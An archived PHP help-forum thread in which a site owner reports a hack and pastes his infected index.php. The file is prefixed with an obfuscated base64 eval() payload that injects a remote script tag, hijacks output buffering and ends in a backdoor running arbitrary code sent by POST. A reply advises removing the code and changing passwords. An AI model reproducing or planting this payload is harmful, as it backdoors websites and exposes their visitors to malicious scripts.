Jump to content

Somebody hacked into my site and changed coding >>> URGENT HELP NEEDED <<<

seopro

By seopro
in PHP Coding Help

Recommended Posts

seopro Newbie

seopro

Posted
Posted

I am not that much into programming , but somebody is hacking to my site and injecting some kind of iframes ... it happened to another site , but that wasn't that important for me, but now it has happened to one of my major site not sure what is going on. Need some immediate help

 

I see this code

 

 

 

Fatal error: Cannot redeclare flq() (previously declared in /home/articles/public_html/lib/functions.compat.php(1) : eval()'d code:1) in /home/articles/public_html/lib/functions.date.php(1) : eval()'d code on line 1 

 

This is the infected index home page file now

 

<?php eval(base64_decode('aWYoIWlzc2V0KCRmbHExKSl7ZnVuY3Rpb24gZmxxKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZuWVdjME5DNWpiMjB2ZG1JdllYSmtiaTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGZscTIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkZmxxMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkZmxxMSkpY2FsbF91c2VyX2Z1bmMoJGZscTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZmxxJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2ZscScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRmbHFsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdmbHEyJykpIT0nZmxxMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?><?php

 

 

include("init.php");

$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');

$GLOBALS["AL_CLASS_INDEX"]->HandlePage();

 

 

?> 

 

This was the original index

 

 

 

<?php

 

 

include("init.php");

$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');

$GLOBALS["AL_CLASS_INDEX"]->HandlePage();

 

 

?> 

 

when I try to replace it agin gives some error it happened a day before , when I replace the index from backup it worked , but today its not working, need some help immediatly .. thanks

 

seopro Newbie

seopro

Posted
  • Author
Posted

Quit it with the 'immediately' and 'urgent' calls, were not slaves.

 

Remove the code in question, change all ftp and hosting passwords.

 

My applogies , its just that I am freaked out this site is all that I have, I have tried to remove the code and then uploaded the file , but it still shows same line of error.

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.